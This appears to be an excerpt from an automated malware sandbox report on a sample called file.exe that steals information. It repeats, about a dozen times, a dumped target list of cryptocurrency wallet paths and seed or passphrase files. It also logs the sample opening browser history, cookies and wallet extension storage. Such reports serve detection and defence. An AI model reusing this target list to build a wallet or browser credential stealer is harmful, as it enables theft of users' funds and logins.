Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
